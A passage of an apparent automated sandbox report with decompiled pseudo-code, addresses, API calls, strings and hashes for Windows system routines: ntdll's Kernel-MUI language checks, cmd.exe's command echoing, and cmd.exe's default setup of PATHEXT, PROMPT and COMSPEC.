					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02378460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0235E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0237718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02378460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0237718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02378460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02378460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02378460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0237718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0235E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02352340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0236E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0235E2A8(_t322,  &_v68, _v16);
								if(E02375553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0236E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0235E2A8(_t322,  &_v68, _t236);
								if(E02375553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0237718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0235E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02352340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0236E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0235E2A8(_v12,  &_v68, _v16);
							if(E02375553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0236E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0235E2A8(_t322,  &_v68, _t269);
							if(E02375553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0237718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0235E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02352340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0236E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0235E2A8(_v12,  &_v68, _v16);
						if(E02375553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0236E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0235E2A8(_t322,  &_v68, _t296);
						if(E02375553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02378788
0x02378788
0x02378791
0x02378794
0x02378798
0x0237879b
0x0237879e
0x023787a1
0x023787a4
0x023787a7
0x023787aa
0x023787af
0x023c1ad3
0x02378b0a
0x02378b0d
0x02378b13
0x02378b19
0x02378b1f
0x02378b25
0x02378b2b
0x02378b31
0x02378b37
0x02378b3d
0x02378b46
0x02378b46
0x023787c6
0x023787d0
0x023c1ae0
0x023c1ae6
0x023c1af8
0x023c1af8
0x023c1afd
0x023c1afe
0x023c1b01
0x023c1b06
0x023c1b06
0x023787d6
0x023787f2
0x023787f7
0x02378807
0x0237880a
0x0237880f
0x02378810
0x02378813
0x02378818
0x02378818
0x0237882c
0x02378831
0x02378838
0x02378908
0x02378920
0x023789f0
0x02378a08
0x02378af6
0x02378af6
0x02378af8
0x02378afb
0x023c1beb
0x023c1beb
0x02378b04
0x023c1bf8
0x023c1c0e
0x023c1c13
0x023c1c16
0x023c1c16
0x023c1bf8
0x00000000
0x02378b04
0x02378a0e
0x02378a11
0x02378a14
0x02378a15
0x02378a18
0x02378a22
0x02378b59
0x02378a28
0x02378a3c
0x02378a3c
0x02378a42
0x023c1bb0
0x023c1b11
0x023c1b11
0x00000000
0x02378a48
0x02378a51
0x02378a5b
0x02378a5e
0x02378a61
0x02378a69
0x02378a69
0x02378a6d
0x00000000
0x00000000
0x02378a74
0x02378a7c
0x02378a7d
0x02378a91
0x02378a93
0x02378a93
0x02378a98
0x02378a9b
0x02378aa1
0x02378aa1
0x02378aa4
0x02378aaa
0x02378ab1
0x02378ac5
0x02378ac7
0x02378ac7
0x02378ac5
0x02378ace
0x023c1bc9
0x023c1bce
0x023c1bd2
0x023c1bd2
0x02378ad8
0x02378aeb
0x02378aeb
0x02378af0
0x02378af4
0x00000000
0x02378af4
0x02378a42
0x02378926
0x02378929
0x0237892c
0x0237892d
0x02378930
0x02378935
0x0237893a
0x02378b51
0x02378940
0x02378954
0x02378954
0x0237895a
0x023c1b63
0x00000000
0x02378960
0x02378969
0x02378973
0x02378976
0x02378979
0x0237897e
0x02378981
0x02378981
0x02378986
0x00000000
0x00000000
0x023c1b6e
0x023c1b74
0x023c1b7b
0x023c1b8f
0x023c1b91
0x023c1b91
0x023c1b99
0x023c1b9c
0x023c1ba2
0x023c1ba2
0x0237898c
0x02378992
0x02378999
0x023789ad
0x023c1ba8
0x023c1ba8
0x023789ad
0x023789b6
0x023789c8
0x023789cd
0x023789d0
0x023789d0
0x023789d6
0x023789e8
0x023789e8
0x023789ed
0x00000000
0x023789ed
0x0237895a
0x0237883e
0x02378841
0x02378844
0x02378845
0x02378848
0x0237884d
0x02378852
0x02378b49
0x02378858
0x0237886c
0x0237886c
0x02378872
0x023c1b0e
0x00000000
0x02378878
0x02378881
0x0237888b
0x0237888e
0x02378891
0x02378896
0x02378899
0x02378899
0x0237889e
0x00000000
0x00000000
0x023c1b21
0x023c1b27
0x023c1b2e
0x023c1b42
0x023c1b44
0x023c1b44
0x023c1b4c
0x023c1b4f
0x023c1b55
0x023c1b55
0x023788a4
0x023788aa
0x023788b1
0x023788c5
0x023c1b5b
0x023c1b5b
0x023788c5
0x023788ce
0x023788e0
0x023788e5
0x023788e8
0x023788e8
0x023788ee
0x02378900
0x02378900
0x02378905
0x00000000
0x02378905

APIs

_wcspbrk.LIBCMT ref: 02378891
_wcspbrk.LIBCMT ref: 02378979
_wcspbrk.LIBCMT ref: 02378A61
_wcspbrk.LIBCMT ref: 02378A9B
_wcspbrk.LIBCMT ref: 023C1B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 02378827
Kernel-MUI-Language-SKU, xrefs: 023789FC
Kernel-MUI-Language-Disallowed, xrefs: 02378914
Kernel-MUI-Number-Allowed, xrefs: 023787E6
WindowsExcludedProcs, xrefs: 023787C1

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: cb1d53debc9d4a7cdd9251f45a82b1492e80f6ab2781caf9a10dd1921eb9cc98
Instruction ID: a149c8b9c9a2ef2daba462c80fff0906703471b233e7a7a87bff6b20397de496
Opcode Fuzzy Hash: cb1d53debc9d4a7cdd9251f45a82b1492e80f6ab2781caf9a10dd1921eb9cc98
Instruction Fuzzy Hash: 46F1E5B2D00219EFCF61EF99C984DEEB7B9BF08304F14446AE905A7611E7349A45EF60

Uniqueness

Uniqueness Score: -1.00%

Function 4A73D1D3, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 314
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E4A73D1D3(intOrPtr __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t69;
				signed int _t74;
				signed int _t81;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr* _t98;
				signed char _t110;
				signed int _t112;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				char* _t123;
				intOrPtr _t124;
				intOrPtr* _t125;

				_t118 = __ecx;
				_t125 = _a4;
				_t69 =  *_t125;
				if(_t69 > 0x37) {
					__eflags = _t69 - 0x38;
					if(__eflags == 0) {
						E4A73D23C(_a8, _a12,  *((intOrPtr*)(_t125 + 0x38)), 1);
						_push(_a12);
						L82:
						_push(_a8);
						_push( *(_t125 + 0x3c));
						L8:
						E4A73D1D3(_t118);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L14:
						__imp__longjmp(0x4a754ac0, 0xffffffff);
						L15:
						_t121 = _a12;
						_t114 = _a8;
						E4A73D23C(_t114, _t121,  *((intOrPtr*)(_t125 + 0x38)), 1);
						_t74 =  *(_t125 + 0x3c);
						__eflags =  *_t74 - 0x38;
						if( *_t74 == 0x38) {
							_t74 =  *(_t74 + 0x3c);
						}
						__eflags =  *((intOrPtr*)(_t74 + 0x40)) - 2;
						if( *((intOrPtr*)(_t74 + 0x40)) == 2) {
							E4A73D23C(_t114, _t121, E4A736098, 1);
						}
						E4A73D1D3(_t118,  *(_t125 + 0x3c), _t114, _t121);
						E4A73D1D3(_t118,  *((intOrPtr*)(_t125 + 0x40)), _t114, _t121);
						__eflags =  *(_t125 + 0x48);
						if( *(_t125 + 0x48) == 0) {
							goto L7;
						} else {
							E4A73D23C(_t114, _t121,  *((intOrPtr*)(_t125 + 0x44)), 1);
							_push(_t121);
							_push(_t114);
							_push( *(_t125 + 0x48));
							goto L8;
						}
					}
					__eflags = _t69 - 0x3a;
					if(_t69 <= 0x3a) {
						__eflags =  *0x4a754081;
						_a4 = 0x4a743da0;
						if( *0x4a754081 != 0) {
							_t84 =  *((intOrPtr*)(_t125 + 0x44));
							__eflags = _t84 - 1;
							if(_t84 != 1) {
								__eflags = _t84 - 2;
								if(_t84 != 2) {
									__eflags = _t84 - 3;
									if(_t84 != 3) {
										__eflags = _t84 - 4;
										if(_t84 != 4) {
											__eflags = _t84 - 5;
											if(_t84 != 5) {
												__eflags = _t84 - 6;
												if(_t84 == 6) {
													_a4 = L"GEQ ";
												}
											} else {
												_a4 = L"GTR ";
											}
										} else {
											_a4 = L"LEQ ";
										}
									} else {
										_a4 = L"LSS ";
									}
								} else {
									_a4 = L"NEQ ";
								}
							} else {
								_a4 = L"EQU ";
							}
						}
						_t122 = _a12;
						_t115 = _a8;
						E4A73D23C(_t115, _t122,  *((intOrPtr*)(_t125 + 0x38)), 1);
						E4A73D23C(_t115, _t122, _a4, 0);
						_t81 =  *(_t125 + 0x3c);
						__eflags = _t81;
						if(_t81 != 0) {
							E4A73D23C(_t115, _t122, _t81, 0);
						}
						_push(_t122);
						_push(_t115);
						L6:
						_push(_t125);
						E4A73D0FE(_t118);
						goto L7;
					}
					__eflags = _t69 - 0x3b;
					if(_t69 == 0x3b) {
						L48:
						_t116 = _a12;
						E4A73D0FE(_t118, _t125, _a8, _t116);
						_t86 =  *_t125;
						__eflags = _t86 - 0x2e;
						if(_t86 < 0x2e) {
							L61:
							_t123 = _a4;
							L62:
							E4A73D1D3(_t118,  *((intOrPtr*)(_t125 + 0x38)), _a8, _t116);
							E4A73D23C(_a8, _t116, _t123, 1);
							_t89 =  *_t125;
							__eflags = _t89 - 0x33;
							if(_t89 == 0x33) {
								goto L7;
							}
							__eflags = _t89 - 0x3b;
							if(_t89 == 0x3b) {
								goto L7;
							}
							_push(_t116);
							goto L82;
						}
						__eflags = _t86 - 0x2f;
						if(_t86 <= 0x2f) {
							_t123 = E4A73272C;
							goto L62;
						}
						__eflags = _t86 - 0x30;
						if(_t86 == 0x30) {
							_t123 = E4A732A7C;
							goto L62;
						}
						__eflags = _t86 - 0x31;
						if(_t86 == 0x31) {
							_t123 = E4A732A58;
							goto L62;
						}
						__eflags = _t86 - 0x32;
						if(_t86 == 0x32) {
							_t123 = E4A732728;
							goto L62;
						}
						__eflags = _t86 - 0x33;
						if(_t86 == 0x33) {
							E4A73D23C(_a8, _t116, 0x4a74bd04, 1);
							_t123 = E4A732A84;
							goto L62;
						}
						__eflags = _t86 - 0x3b;
						if(_t86 != 0x3b) {
							goto L61;
						}
						E4A73D23C(_a8, _t116, 0x4a74bd08, 1);
						_t123 = E4A7325B8;
						goto L62;
					}
					__eflags = _t69 - 0x3c;
					if(_t69 != 0x3c) {
						goto L14;
					}
					_t92 =  *0x4a770918; // 0x0
					__eflags = _t92 - 0x2396;
					if(_t92 != 0x2396) {
						__eflags = _t92 - 0x2395;
						if(_t92 != 0x2395) {
							__eflags = _t92 - 0x2390;
							if(_t92 != 0x2390) {
								goto L14;
							}
							_push(1);
							_push(L"REM /?");
							L47:
							_push(_a12);
							_push(_a8);
							E4A73D23C();
							goto L7;
						}
						_push(1);
						_push(L"IF /?");
						goto L47;
					}
					_push(1);
					_push(L"FOR /?");
					goto L47;
				}
				if(_t69 >= 0x34 || _t69 == 0) {
					L3:
					E4A73D23C(_a8, _a12,  *((intOrPtr*)(_t125 + 0x38)), 1);
					_t95 =  *(_t125 + 0x3c);
					if( *(_t125 + 0x3c) != 0) {
						E4A73D23C(_a8, _a12, _t95, 0);
					}
					_push(_a12);
					_push(_a8);
					goto L6;
				} else {
					__eflags = _t69 - 0x2b;
					if(_t69 == 0x2b) {
						_t124 = _a12;
						_t117 = _a8;
						E4A73D23C(_t117, _t124, "FOR", 1);
						__eflags =  *0x4a754081;
						if( *0x4a754081 == 0) {
							L33:
							_t98 = 0x4a7545e8;
							do {
								_t119 =  *_t98;
								_t98 = _t98 + 2;
								__eflags = _t119;
							} while (_t119 != 0);
							_t118 =  *((intOrPtr*)(_t125 + 0x38));
							E4A73D23C(_t117, _t124,  *((intOrPtr*)(_t125 + 0x38)) + (_t98 - 0x4a7545ea >> 1) * 2, 1);
							E4A73D23C(_t117, _t124, 0x4a74bd04, 1);
							E4A73D23C(_t117, _t124,  *(_t125 + 0x3c), 0);
							E4A73D23C(_t117, _t124, E4A732A84, 0);
							E4A73D23C(_t117, _t124,  *((intOrPtr*)(_t125 + 0x38)) + 0x2c, 1);
							_push(_t124);
							_push(_t117);
							_push( *((intOrPtr*)(_t125 + 0x40)));
							goto L8;
						}
						_t110 =  *(_t125 + 0x48);
						__eflags = _t110 & 0x00000001;
						if((_t110 & 0x00000001) == 0) {
							__eflags = _t110 & 0x00000002;
							if((_t110 & 0x00000002) == 0) {
								__eflags = _t110 & 0x00000008;
								if((_t110 & 0x00000008) == 0) {
									__eflags = _t110 & 0x00000004;
									if((_t110 & 0x00000004) == 0) {
										goto L33;
									}
									_push(1);
									_push(0x4a754608);
									L30:
									_push(_t124);
									_push(_t117);
									E4A73D23C();
									_t112 =  *(_t125 + 0x4c);
									__eflags = _t112;
									if(_t112 == 0) {
										goto L33;
									}
									_push(1);
									_push(_t112);
									goto L32;
								}
								_push(1);
								_push(0x4a754600);
								goto L30;
							} else {
								_push(1);
								_push(0x4a7545f8);
								goto L32;
							}
						} else {
							_push(1);
							_push(0x4a7545f0);
							L32:
							_push(_t124);
							_push(_t117);
							E4A73D23C();
							goto L33;
						}
					}
					__eflags = _t69 - 0x2c;
					if(_t69 == 0x2c) {
						goto L15;
					}
					__eflags = _t69 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L14;
					}
					__eflags = _t69 - 0x33;
					if(_t69 <= 0x33) {
						goto L48;
					}
					goto L14;
				}
			}

0x4a73d1d3
0x4a73d1da
0x4a73d1dd
0x4a73d1e3
0x4a747427
0x4a74742a
0x4a7475eb
0x4a7475f0
0x4a7475f3
0x4a7475f3
0x4a7475f6
0x4a73d230
0x4a73d230
0x4a73d229
0x4a73d22d
0x4a73d22d
0x4a747430
0x4a7472e3
0x4a7472ea
0x4a7472f0
0x4a7472f0
0x4a7472f3
0x4a7472fd
0x4a747302
0x4a747305
0x4a747308
0x4a74730a
0x4a74730a
0x4a74730d
0x4a747311
0x4a74731c
0x4a74731c
0x4a747326
0x4a747330
0x4a747335
0x4a747339
0x00000000
0x4a74733f
0x4a747346
0x4a74734b
0x4a74734c
0x4a74734d
0x00000000
0x4a74734d
0x4a747339
0x4a747436
0x4a747439
0x4a747545
0x4a74754c
0x4a747553
0x4a747555
0x4a747558
0x4a74755b
0x4a747566
0x4a747569
0x4a747574
0x4a747577
0x4a747582
0x4a747585
0x4a747590
0x4a747593
0x4a74759e
0x4a7475a1
0x4a7475a3
0x4a7475a3
0x4a747595
0x4a747595
0x4a747595
0x4a747587
0x4a747587
0x4a747587
0x4a747579
0x4a747579
0x4a747579
0x4a74756b
0x4a74756b
0x4a74756b
0x4a74755d
0x4a74755d
0x4a74755d
0x4a74755b
0x4a7475aa
0x4a7475ad
0x4a7475b7
0x4a7475c3
0x4a7475c8
0x4a7475cb
0x4a7475cd
0x4a7475d4
0x4a7475d4
0x4a7475d9
0x4a7475da
0x4a73d221
0x4a73d221
0x4a73d222
0x00000000
0x4a73d222
0x4a74743f
0x4a747442
0x4a747494
0x4a747494
0x4a74749c
0x4a7474a1
0x4a7474a3
0x4a7474a6
0x4a747510
0x4a747510
0x4a747513
0x4a74751a
0x4a747526
0x4a74752b
0x4a74752d
0x4a747530
0x00000000
0x00000000
0x4a747536
0x4a747539
0x00000000
0x00000000
0x4a74753f
0x00000000
0x4a74753f
0x4a7474a8
0x4a7474ab
0x4a747509
0x00000000
0x4a747509
0x4a7474ad
0x4a7474b0
0x4a747502
0x00000000
0x4a747502
0x4a7474b2
0x4a7474b5
0x4a7474fb
0x00000000
0x4a7474fb
0x4a7474b7
0x4a7474ba
0x4a7474f4
0x00000000
0x4a7474f4
0x4a7474bc
0x4a7474bf
0x4a7474e8
0x4a7474ed
0x00000000
0x4a7474ed
0x4a7474c1
0x4a7474c4
0x00000000
0x00000000
0x4a7474d1
0x4a7474d6
0x00000000
0x4a7474d6
0x4a747444
0x4a747447
0x00000000
0x00000000
0x4a74744d
0x4a747452
0x4a747457
0x4a747462
0x4a747467
0x4a747472
0x4a747477
0x00000000
0x00000000
0x4a74747d
0x4a74747f
0x4a747484
0x4a747484
0x4a747487
0x4a74748a
0x00000000
0x4a74748a
0x4a747469
0x4a74746b
0x00000000
0x4a74746b
0x4a747459
0x4a74745b
0x00000000
0x4a74745b
0x4a73d1ec
0x4a73d1f6
0x4a73d201
0x4a73d206
0x4a73d20b
0x4a73d216
0x4a73d216
0x4a73d21b
0x4a73d21e
0x00000000
0x4a7472c1
0x4a7472c1
0x4a7472c4
0x4a747355
0x4a747358
0x4a747364
0x4a747369
0x4a747370
0x4a7473bf
0x4a7473bf
0x4a7473c7
0x4a7473c7
0x4a7473cb
0x4a7473cc
0x4a7473cc
0x4a7473d1
0x4a7473e0
0x4a7473ee
0x4a7473fa
0x4a747408
0x4a747418
0x4a74741d
0x4a74741e
0x4a74741f
0x00000000
0x4a74741f
0x4a747372
0x4a747375
0x4a747377
0x4a747382
0x4a747384
0x4a74738f
0x4a747391
0x4a74739c
0x4a74739e
0x00000000
0x00000000
0x4a7473a0
0x4a7473a2
0x4a7473a7
0x4a7473a7
0x4a7473a8
0x4a7473a9
0x4a7473ae
0x4a7473b1
0x4a7473b3
0x00000000
0x00000000
0x4a7473b5
0x4a7473b7
0x00000000
0x4a7473b7
0x4a747393
0x4a747395
0x00000000
0x4a747386
0x4a747386
0x4a747388
0x00000000
0x4a747388
0x4a747379
0x4a747379
0x4a74737b
0x4a7473b8
0x4a7473b8
0x4a7473b9
0x4a7473ba
0x00000000
0x4a7473ba
0x4a747377
0x4a7472ca
0x4a7472cd
0x00000000
0x00000000
0x4a7472cf
0x4a7472d2
0x00000000
0x00000000
0x4a7472d8
0x00000000
0x00000000
0x4a7472da
0x4a7472dd
0x00000000
0x00000000
0x00000000
0x4a7472dd

APIs

longjmp.MSVCRT(4A754AC0,000000FF,00000000,?,00002000,?,4A73D199,00000000,-00000003,00004000,-00000003,00004000, /D /c",?,?,4A73D126), ref: 4A7472EA

Strings

NEQ , xrefs: 4A74756B
REM /?, xrefs: 4A74747F
IF /?, xrefs: 4A74746B
GEQ , xrefs: 4A7475A3
LSS , xrefs: 4A747579
LEQ , xrefs: 4A747587
GTR , xrefs: 4A747595
FOR /?, xrefs: 4A74745B
EQU , xrefs: 4A74755D
FOR, xrefs: 4A74735D, 4A7473BF, 4A7473DD

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: longjmp
String ID: EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
API String ID: 1832741078-3035295614
Opcode ID: 751d27c3dde4b7753abf13f7cb8b90117b4ab61ba78172fb39b65ce80ba696ef
Instruction ID: 3b0e21debafd66667049b94a55bb53f8b45a17d49eaf952040628ee3a9ea5d4f
Opcode Fuzzy Hash: 751d27c3dde4b7753abf13f7cb8b90117b4ab61ba78172fb39b65ce80ba696ef
Instruction Fuzzy Hash: 7AA19AB011C645BAEBB05B50CC84E9B7F6AEB85710F12CC15FA01EE553C3B2E989D764

Uniqueness

Uniqueness Score: -1.00%

Function 4A7386C9, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E4A7386C9(long __ebx, char* __edi, void* __esi) {
				short _t13;
				short _t15;
				WCHAR* _t17;
				void* _t22;
				long _t26;
				void* _t28;
				short _t32;
				short* _t34;
				signed int _t39;
				WCHAR* _t41;

				_t35 = __edi;
				_t26 = __ebx;
				_push(__ebx);
				_push(__edi);
				_t41 = E4A731896(0x208);
				if(_t41 == 0) {
					_push(1);
					E4A7372E9(_t28, __edi, _t41, __eflags);
					L9:
					E4A731730(_t35, E4A733AFC);
					L2:
					_t36 = L"PATHEXT";
					if(E4A732070(L"PATHEXT") == 0) {
						E4A731730(_t36, L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t37 = L"PROMPT";
					if(E4A732070(L"PROMPT") == 0) {
						E4A731730(_t37, L"$P$G");
					}
					if(E4A732070(L"COMSPEC") == 0) {
						_t13 = E4A7318EB(_t41, 0x2e);
						__eflags = _t13;
						if(_t13 != 0) {
							L18:
							E4A731730(L"COMSPEC", _t41);
							goto L5;
						}
						__imp___wcsupr( *0x4a770648);
						_t17 = _t41;
						_t1 =  &(_t17[1]); // 0x2
						_t34 = _t1;
						do {
							_t32 =  *_t17;
							_t17 =  &(_t17[1]);
							__eflags = _t32;
						} while (_t32 != 0);
						_t39 = _t17 - _t34 >> 1;
						_t22 = E4A732148(_t41,  *0x4a770664 & 0x0000ffff);
						_t3 = _t39 * 2; // -2
						__eflags = _t41 + _t3 - 2 - _t22;
						if(_t41 + _t3 - 2 == _t22) {
							_push( &M4A7549B6);
						} else {
							_push(L"\\CMD.EXE");
						}
						_push(_t26);
						_push(_t41);
						E4A7320A9(_t41);
						goto L18;
					} else {
						L5:
						_t15 = E4A732070(L"KEYS");
						if(_t15 != 0) {
							__imp___wcsicmp(_t15, 0x4a74bd54);
							__eflags = _t15;
							if(_t15 == 0) {
								 *0x4a7706bc = 1;
							}
						}
						return E4A737267(0x4a755260);
					}
				}
				_t26 = 0x104;
				GetModuleFileNameW(0, _t41, 0x104);
				_t35 = L"PATH";
				if(E4A732070(L"PATH") == 0) {
					goto L9;
				}
				goto L2;
			}

0x4a7386c9
0x4a7386c9
0x4a7386cb
0x4a7386cd
0x4a7386d8
0x4a7386dc
0x4a74694c
0x4a74694e
0x4a746953
0x4a746959
0x4a738704
0x4a738704
0x4a738711
0x4a746969
0x4a746969
0x4a738717
0x4a738724
0x4a73bd40
0x4a73bd40
0x4a738736
0x4a746976
0x4a74697b
0x4a74697d
0x4a7469ca
0x4a7469d0
0x00000000
0x4a7469d0
0x4a746985
0x4a74698b
0x4a74698e
0x4a74698e
0x4a746991
0x4a746991
0x4a746995
0x4a746996
0x4a746996
0x4a74699f
0x4a7469aa
0x4a7469af
0x4a7469b3
0x4a7469b5
0x4a7469be
0x4a7469b7
0x4a7469b7
0x4a7469b7
0x4a7469c3
0x4a7469c4
0x4a7469c5
0x00000000
0x4a73873c
0x4a73873c
0x4a738741
0x4a73874b
0x4a7469e0
0x4a7469e8
0x4a7469ea
0x4a7469f0
0x4a7469f0
0x4a7469ea
0x4a73875b
0x4a73875b
0x4a738736
0x4a7386e2
0x4a7386eb
0x4a7386f1
0x4a7386fe
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0

GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,4A755260,4A768640,00000104,4A73858C,4A755260,00000104,00000000,4A768640,00002000,00000000), ref: 4A7386EB

Part of subcall function 4A732070: GetEnvironmentVariableW.KERNEL32(?,4A760640,00002000,75A9F670,?,?,4A73BEFF,00000000), ref: 4A73208E

_wcsupr.MSVCRT ref: 4A746985
_wcsicmp.MSVCRT ref: 4A7469E0

Strings

\CMD.EXE, xrefs: 4A7469B7
